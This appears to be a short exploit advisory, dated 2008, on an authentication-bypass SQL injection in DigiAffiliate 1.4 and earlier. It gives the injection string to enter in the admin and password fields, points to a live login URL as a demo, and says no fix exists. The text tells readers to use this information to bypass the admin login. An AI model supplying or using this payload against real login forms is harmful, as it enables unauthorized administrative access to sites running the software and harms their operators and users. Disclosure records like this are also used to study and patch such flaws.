DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection Vulnerability

2008-11-08 03:01:03

###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd
[-] Greetz : All my freind
################################################################################################
Use these information to bypass adminlogin

admin : ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.